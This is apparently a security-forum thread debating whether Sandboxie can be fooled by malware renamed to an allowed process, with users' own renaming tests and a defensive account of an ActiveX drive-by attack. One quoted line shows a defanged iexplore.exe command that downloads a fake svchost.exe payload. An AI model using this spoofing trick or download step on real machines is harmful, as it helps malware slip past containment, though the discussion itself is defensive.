Sandboxie - How safe do you think it is?

I don't think you did - I think you put a very interesting question very clearly

philby

 

In it's own way, Sandboxie does recognize applications downloaded into the sandbox such as with the scenario you mentioned. If only specified programs are allowed internet access and/or execution, only those programs residing on the real system is given such access. If, like in the case you mentioned, a malware tries to spoof a process name and gets downloaded into the sandboxed, it will not run or be granted internet access regardless of the name as long as there are start/run access and internet access settings specified.

 

I'm not sure why the Reader needs to access the internet. When you read a PDF file on the web, you are really reading it from your hard drive, since the file is cached by your browser.

For your other concerns, it seems to me that a personal firewall with application monitoring would take care of everything

For example, the recent PDF exploits used the Reader to connect out to download malware, and a properly configured firewall would alert:

​

Whether a sandbox rule could block access out except for the browser, is not clear to me.

EDIT: I just saw the previous post! Thanks.

For spoofing of an application: Again, a firewall which checks the path/MD5 signature of the approved applications that can connect out would flag a spoof as here, where a trojan copies itself to %temp% as svchost.exe and attempts to connect out. It is not the correct path, of course, so the firewall alerts:

​

Here, I replace Opera.exe with a different version. Not being the MD5 signature for the permitted Opera.exe, the firewall alerts:

​

I don't use sandboxie, but I'm interested in it. I'm not clear as to whether or not it's supposed to do all that you are asking here. Hence, If I were to evaluate it, I would not give up (yet!) my other security measures!

----
rich

 

Thank you for those screenshots.

So, let me see if I am understanding it as I should be. If, in the new example I gave, iexplore.exe is the only process allowed to access the Internet, then, even if something else gets installed or tries to run in that sandbox, even if having the same name, it won't be possible. That's something I was aware of.

But, you say, and that was exactly my thought,

What if such is not specified, then the situation I mentioned, could it become reality? And, that's exactly the question I wanted to raise. But, I guess I never found the best approach, and proper words to do it so.

In such scenario, where there are no start/run access and Internet access settings specified, then it could pose a risk?


Again, thank you for your feedback.

 

It was just an hypothetical process name. I just thought of Adobe Reader, actually.

 

No start/run or internet access settings which defaults to everything can run and have net access except for progs requiring driver install but all within the confines of the sandbox. Yes, it can be a possible risk depending on what you're going to run and do in the sandbox. But then again, why not harden the settings for that particular sandbox and reduce that possible risk of running a keylogger while banking online? Should also factor in the browser used. Rmus has stated in other threads that he has yet to find an in-the-wild exploit for a properly configured Opera or Firefox. With an unpatched IE, well...

 

How is a keylogger going to get inside the sandbox?

----
rich

 

I have tested Sandboxie extensively and I can vouch for its effectiveness.

 

I'm assuming via activex or user input since no settings for start/run access.

 

Can you give an example of an activeX exploit that would load a keylogger into the sandbox?

And an example of user input?

thanks,

rich

 

What types of tests have you used?

I'm interested in sandboxie but have not yet tried it out.

thanks,

rich

 

I haven't encountered any keyloggers via activex as of yet. As for user input, the user can run or install a program in the sandbox since it has no start/run settings in place. Just did a quick test and installed Easy macro recorder in a sandbox and it was able to record key and mousestrokes. SBIE pop up as shown on attachment when the recorded macro was played. When user opts to hide the sandboxie message, the macro continues as recorded.

So in theory, a keylogger can be downloaded and executed in a sandboxed session wherein the sandbox has no specified start/run and internet access settings. http://www.sandboxie.com/index.php?DetectingKeyLoggers

Maybe other users of SBIE who like to test nasty stuff via sandbox has a live keylogger exploit somewhere for you to check out

 

"In such scenario, where there are no start/run access and Internet access settings specified, then it could pose a risk?"

Your entire scenerio is based on Sandboxie telling the difference between a program you have allowed to run, and a spoofed program. If you didn't specify something to run or to access the internet, then what is Sandboxie telling the difference between? With this new question, what would Sandboxie be checking the signature of?

 

And just to add to what Pete is saying; Why would that Killdisk "Choose" to run in the sandbox when it already exists on the system? And more to the flip-flopedness of this whole thing; It seems to me that the malware might scan the Sandboxie config file AND AVOID being renamed something that is allowed to run. Which underscores that there would be no purpose in that malware and no harm caused by the malware (even if everything happened as you are worried). So why put it to the developer to take on such a task as checking digital signatures .... when Sandboxie is not even digitally signed itself?

 

As a matter of fact, one has been in the wild this week. Ronjor posted the Microsoft Advisory here:

Microsoft Security Advisory (972890)
Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution
https://www.wilderssecurity.com/showthread.php?t=247177

I wonder how many people in this thread read the advisory. And how many searched for more information.

Microsoft DirectShow vulnerability used in drive-by-download attacks
http://www.thetechherald.com/articl...lity-used-in-drive-by-download-attacks-Update

More searching reveals some interesting things:

http://translate.google.com/transla...r.asp?tekstID=799&sl=da&tl=en&history_state0=

Once redirected to a hostile server (most are .cn domains), a script downloads a file with code that downloads a malware executable named svchost.exe:

Code:

C:\%programfiles%\Internet Explorer\iexplore.exe "hxxp://xxxxx/wm/svchost.exe 

How to defend

It's not necessary to have a degree in computer science (I certainly don't!) to understand from the above information what is going on.

First, it's obvious that a script sets this exploit in motion. For those with IE, how do you configure scripting? This should be a no-threat if your zones and whatever are set up properly.

Secondly, it's a typical drive-by download that attempts to sneak in a malicious executable. From the advisory:

If you follow these types of exploits (and experienced people in these threads should), it should be obvious that they are all the same - just using different vulnerabilities to sneak in a malware executable.

A test shows that any HIPS or other product, or Software Restriction Policies with White List protection easily handles this:

​

For those who use a Sandbox, Peter2150 has shown that these types of attacks are successfully contained in the Sandbox.

I prefer to prevent the exploit from running in the first place. Just a different approach to solving a problem!


----
rich

 

The more I think about this the more confused I get LOL.

I had actually thought that Sbie did some sort of application check and in the past I remember renaming a malware sample on my desktop to firefox.exe and then right-clicking it to run sandboxed and it would not run. I did have start/run and internet access restrictions at the time so I assumed that Sbie was checking hashes or file locations.

In my current sandbox that is running firefox, I was able to take ccleaner.exe and copy/paste it to the desktop and rename it firefox.exe and it ran in my restricted sandbox along with the real firefox. This proves that you need to keep your system clean and that is why I scan everything I remove from my sandbox (before running it) with multiple scanners and only download from "trusted" sources. Also remember that if that faked cleaner/firefox.exe was a forced program then the real and fake firefox may run together sandboxed and if the faked one was a keylogger then... well, you get the picture. Keep your machine clean .

In a thread I posted in a little while back, I was able to download and run a keylogger add-on for firefox and the only thing that stopped it or gave me the chance to stop it was firefox giving a pop-up about a new add-on. I admit, that's not sandboxies fault but if the browser had a flaw where an add-on could install silently it could record your keystrokes during that Sandboxied browsing session. If you follow recommended advice of starting a clean sandbox session before doing a financial transaction and then deleting the sandbox afterwords you should be fine.
https://www.wilderssecurity.com/showthread.php?t=242348

Ok, that's all the imaginative ideas I have for now but it does give "simulated" real world examples of what could happen if certain procedures aren't followed when using Sbie or if your sandboxed programs are exploited.

Also, please no flaming as I'm only pointing out my simple tests. I also like Sbie and have used it for quite some time.

Edited to add link

 

Prevention being better than cure.

However, some people like to see how malware runs so by executing it within a sandbox environment means they're still safe as it's contained. Once the session is closed, traces of that infection are gone. That's how I understand it anyway.

 

then there is malware that seemingly refuses to run if it detects sandbox
http://www.dslreports.com/forum/r22677694-Trojan-checks-for-SandBoxIE-presence

 

I understand how Sandboxie works. As I mentioned since the very beginning this was all an hypothetical situation. And the reason why I raised this hypothetical situation, was that Sandboxie does allow us to add processes only by their names, rather than going to the path file. I can add XYZ.exe, just by writing it. So, I started to wonder, hypothetically, what could happen. I guess that it doesn't hurt nobody to ask this sort of things.

The reason I asked here, and not at Sandboxie forum, in the first place, was that I wanted to know the opinion of the folks here.

So, in your opinion no one can discuss hypothetical situations. We need to have facts. It's your opinion, and I respect that. The same way, I believe you have to respect the fact I raised this thread, based on a hypothetical situation. I also believe I did this, in a way that I wasn't going against forum policies.

Never, since the beginning of this thread I started FUD. All I ever did was raise a question. If people wanted to share their thoughts, they'd be welcome. That's all I did.

I never stated - Hey don't use Sandboxie, as it won't protect you, etc...

And, pretty much every thread in this forum talking about anti-viruses missing malware, HIPS failing leak tests, etc, all those threads are spreading FUD.

Also, I said that if you actually believe this thread was misleading, spreading FUD and other stuff, then to close it and even delete it.

I also don't understand why talking about Killdisk. I talked about keyloggers. They do not destroy anything in the system. Their solely purpose is to record keystrokes. While killdisk, as you well say, while sandboxed wouldn't do anything bad to the system, a keylogger doesn't have as a target your system, rather, for example, your "wallet".

I did some testing (I should have done it before, I guess. Sorry about that.), and despite I have Opera sandbox set with restriction to allow allow opera.exe and acrord32.exe to start, a fake opera.exe process, which in this case is a disguised 7-zip installation, did start sandbox along side Opera browser. I have Sandboxie set to display issue messages, but it didn't. I guess because the fake process I created, by disguising 7-zip installation package, is named opera.exe

So, Sandboxie does not check if the process is the real deal or not, despite it does say in the restriction settings that if such restrictions are applied, the processes won't run.

7-zip installation package, which I renamed opera.exe, did start sandboxed, without Sandboxie issuing any messages, or preventing it from running.

 

You can rename any program you want to - on your side of the computer. Rename calc.exe to Opera.exe and it will run in that sandbox. Rename notepad.exe to Opera.exe and it will run in that sandbox.

"Programs that are installed or downloaded into this sandbox will never be allowed to run, even if they match the name listed above."

It doesn't say; "programs that you rename to match the program above will never be allowed to run"

 

Why don't you try this; create a sandbox that only allows Internet Explorer and Opera to run. Start with an empty sandbox and open Internet Explorer sandboxed in that sandbox. Go to the Opera download page and download the Opera executable and don't choose "save" but choose "run" instead. Let it install Opera in that sandbox, and see if that Opera can run or not ...... (you may have to also allow the setup.exe)

Or only allow the real Opera to Run and install another instance of Opera.exe in that sandbox and see if that runs.

Test it farther by doing the exact same thing as above but uninstall your real Opera first. So fit it to your scenerio; You have Opera installed for real and allow it to run in a sandbox. But then you uninstall Opera and forget to adjust the sandboxie settings. But install it into the sandbox, like a malware would do.

 

Hello Peter,

Thank you for your reply. I do appreciate your feedback.

Yes, I am perfectly capable of monitoring my system to see what is happening, and if something even tries to get in my system. If it manages to get through, then I must confess I'll admire who ever created that piece of malware. He/She/they should gain my deepest respect.

I'm not saying I know all, because I don't. I'm still learning. But, the knownledge I have, until this precise moment, provides me a decent security. Of course, I won't rely entirely on it. It would be my bigest mistake, at least for now.

But, that, doesn't mean that I can't place myself in the situation of a casual user. I used to be one of them, not so long ago. And, I sure was one when first started to discover Sandboxie.

But, the same doesn't apply to those casual users who get advised by someone to install XYZ application (where we can include Sandboxie), while the very same people advising them, have no clue of what those tools are capable of (for the good and for the bad).

I do believe that, from the point of view of a casual user, the sort of question I made makes all the sense. Maybe not to you and me, because we know that Sandboxie will keep us well protected by applying strict settings, but it will make sense in the thoughts of those casual users.

It sure did make sense to me, when I first used it. At that time, I was a complete nullity about Sandboxie. After all, pretty much everything begins with hypothetical situations.

I'm pretty sure that some random user looking to know more about Sandboxie, and ends up here, will understand a bit more what it can do for him/her. Some doubts (maybe this same one I raised) will be clarified.

It took a hell long time for everyone to realize that the Earth is, after all, a sphere.


Regards